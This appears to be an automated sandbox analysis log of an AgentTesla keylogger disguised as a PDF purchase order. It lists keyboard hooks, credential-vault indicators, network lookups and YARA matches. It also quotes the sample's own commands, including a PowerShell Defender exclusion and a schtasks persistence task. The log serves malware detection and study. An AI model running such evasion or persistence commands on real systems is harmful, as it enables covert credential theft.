                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.000000000284C000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003351000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.0000000003071000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.000000000284C000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003351000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.0000000003071000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.000000000284C000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003351000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.0000000003071000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55429
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55429 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49720 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:55429 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, SKTzxzsJw.cs.Net Code: _71ZRqC1D
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, SKTzxzsJw.cs.Net Code: _71ZRqC1D
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: z38PO_20248099-1_pdf.exe
                    Source: initial sampleStatic PE information: Filename: z38PO_20248099-1_pdf.exe
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 0_2_0102DF9C0_2_0102DF9C
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 0_2_050BA0700_2_050BA070
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 0_2_050BF3980_2_050BF398
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 0_2_050B5BF80_2_050B5BF8
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 0_2_071165880_2_07116588
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 0_2_071100400_2_07110040
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_02654A6810_2_02654A68
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_0265E9F810_2_0265E9F8
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_02653E5010_2_02653E50
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_0265AF3710_2_0265AF37
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_0265419810_2_02654198
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064AC52C10_2_064AC52C
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064A378410_2_064A3784
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064A609610_2_064A6096
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064A53A810_2_064A53A8
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064A53A210_2_064A53A2
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064A1CC010_2_064A1CC0
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064C56A810_2_064C56A8
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064C670010_2_064C6700
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064C357810_2_064C3578
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064CB34210_2_064CB342
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064C7E9010_2_064C7E90
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064C274A10_2_064C274A
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064C77B010_2_064C77B0
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064CE4C810_2_064CE4C8
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064C004010_2_064C0040
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064C5DF710_2_064C5DF7
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeCode function: 10_2_064C003E10_2_064C003E
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 11_2_01454AFF11_2_01454AFF
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 11_2_0145DF9C11_2_0145DF9C
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 11_2_055982F811_2_055982F8
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 11_2_0559051811_2_05590518
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 11_2_0559050811_2_05590508
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 11_2_055982EA11_2_055982EA
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 11_2_055C5B9711_2_055C5B97
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 11_2_055C5BA811_2_055C5BA8
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_03214A6815_2_03214A68
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_0321E9F815_2_0321E9F8
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_03213E5015_2_03213E50
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_0321419815_2_03214198
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F3C6CC15_2_06F3C6CC
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F31AA815_2_06F31AA8
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F3554215_2_06F35542
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F3554815_2_06F35548
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F31E6815_2_06F31E68
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F456A815_2_06F456A8
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F4670015_2_06F46700
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F4357815_2_06F43578
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F47E9015_2_06F47E90
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F477B015_2_06F477B0
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F4271015_2_06F42710
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F4E4C815_2_06F4E4C8
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F4004015_2_06F40040
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F45DF715_2_06F45DF7
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeCode function: 15_2_06F4003E15_2_06F4003E
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_01704AFF16_2_01704AFF
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_0170DF9C16_2_0170DF9C
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_058682F816_2_058682F8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_0586050816_2_05860508
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_0586051816_2_05860518
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_058604C016_2_058604C0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_058682EB16_2_058682EB
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_05ECA07016_2_05ECA070
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_05ECF39816_2_05ECF398
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_05EC5C0816_2_05EC5C08
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_05EC5C0016_2_05EC5C00
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 16_2_05EC5BF816_2_05EC5BF8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_03024A6819_2_03024A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_0302E8D819_2_0302E8D8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_03023E5019_2_03023E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_0302AC7019_2_0302AC70
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_0302419819_2_03024198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06DD56B019_2_06DD56B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06DD670819_2_06DD6708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06DD358019_2_06DD3580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06DD7E9819_2_06DD7E98
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06DD77B819_2_06DD77B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06DD004019_2_06DD0040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06DD5DFF19_2_06DD5DFF
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 19_2_06DD000719_2_06DD0007
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 21_2_00C3DF9C21_2_00C3DF9C
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 21_2_06D9576821_2_06D95768
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 21_2_06D9004021_2_06D90040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 21_2_06D9517821_2_06D95178
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_01514A6824_2_01514A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_0151AC7024_2_0151AC70
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_01513E5024_2_01513E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_0151419824_2_01514198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_0151E9BF24_2_0151E9BF
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_06CC670824_2_06CC6708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_06CC358024_2_06CC3580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_06CC77B824_2_06CC77B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_06CCE4D024_2_06CCE4D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_06CC5DFF24_2_06CC5DFF
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_06CC234924_2_06CC2349
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_06CC004024_2_06CC0040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 24_2_06CC003F24_2_06CC003F
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1447223274.0000000003E1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1446067123.0000000002C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000000.1387309035.000000000067A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexaHV.exeb! vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1440691328.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1449696079.0000000007630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 0000000A.00000002.3854298767.00000000008F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exeBinary or memory string: OriginalFilenamexaHV.exeb! vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: z38PO_20248099-1_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: FrFvspxoHsPs.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, hyUOVBe1ZWdha1wZaD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, vFQ3EBHyQMQUMUhg1F.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, vFQ3EBHyQMQUMUhg1F.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, vFQ3EBHyQMQUMUhg1F.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, hyUOVBe1ZWdha1wZaD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, vFQ3EBHyQMQUMUhg1F.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, vFQ3EBHyQMQUMUhg1F.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, vFQ3EBHyQMQUMUhg1F.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@33/20@2/2
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile created: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: \Sessions\1\BaseNamedObjects\TXGnEFlEXydaiQyuTdtXJztKri
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD40B.tmpJump to behavior
                    Source: z38PO_20248099-1_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: z38PO_20248099-1_pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: z38PO_20248099-1_pdf.exeReversingLabs: Detection: 65%
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile read: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
